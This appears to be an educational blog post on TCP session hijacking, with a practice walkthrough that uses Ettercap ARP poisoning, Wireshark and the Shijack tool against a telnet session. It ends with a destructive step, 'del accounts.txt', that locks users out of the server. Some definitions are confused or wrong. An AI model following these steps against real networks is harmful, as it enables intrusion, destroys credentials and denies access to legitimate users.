What is Session Hijacking?
Session hijacking is when an authorized user accesses another user’s actual network connection. This is usually to bypass password authentication, which is the starting point of the session.
TCP/IP hijacking, also called active sniffing, involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system. The server will not know that this has occurred and will respond as if the client were trusted.
Who and Why does the TCP Session Hijacking?
The attackers who are looking to do the session hijacking are usually people or hackers who wants to access the personal data of a target or user. These hijackers can gain information and also privilege of an account without the trouble of looking up the user id and password or authentications. Session hijackers benefit from any unencrypted communication protocol in a network, their only main target of information are IP address and the open port of the target.
Where and When Session Hijacking usually occurs?
Session hijacking exploitation, as mentioned before, usually occurs when a communication protocol is in a condition that is not unencrypted. The attackers mostly located in the same network as the victim as it is easier for them to gather information from network sniffing such as, IP address and open port.
How to do the TCP session Hijacking(PRACTICE)
Ettercap– To do the man in the middle attack of ARP-poisoning between the victim or target and server.
Wireshark – To gather the packets from the communication transferred between target and find ports
SHIJACK – The most popular tool for TCP/IP hijacking, it uses a spoofing technique to hijack the protocols. “Shijack” is the network spoofing tool developed in a Python Language.
Link: http://packetstromsecurity.com/sniffers/shijack.tgz.
Scenario – We aim to hijack a telnet session between server and client
- Setup telnet connection between server and client(target)
- Use Ettercap to do MITM to the telnet connection, do unified sniffing then scan hosts. add server’s IP address as target 1 and add victim’s IP address as target 2.
- Then, start sniffing the connection by ARP poisoning in the MITM tab
- Start Wireshark as a sniffer to get any packet of the telnet connection. After we get one, take the required information; Source IP, Source port, Destination IP, and Destination Port.
- After that we can use shijack to hijack the victim’s session.
- Use the gathered information to start hijacking the session.
- After hijack session started, I tried to permanently delete the account credential of the telnet server. Since the telnet server is using Windows, type “del accounts.txt” in shijack session. If any user tries to login to the telnet server, telnet will display error.
Conclusion and Solution
So as discussed above, we can conclude that session hijacking is quiet dangerous because it is a process when an authorized user accesses another user’s actual network connection. This is usually to bypass password authentication, which is the starting point of the session.
To avoid session hijacking, it is recommendable for the server to encrypt the communication protocols as much as possible. As for the client, it is possible to avoid session hijackers from getting the client’s session by not using any public network that is used by many strangers.
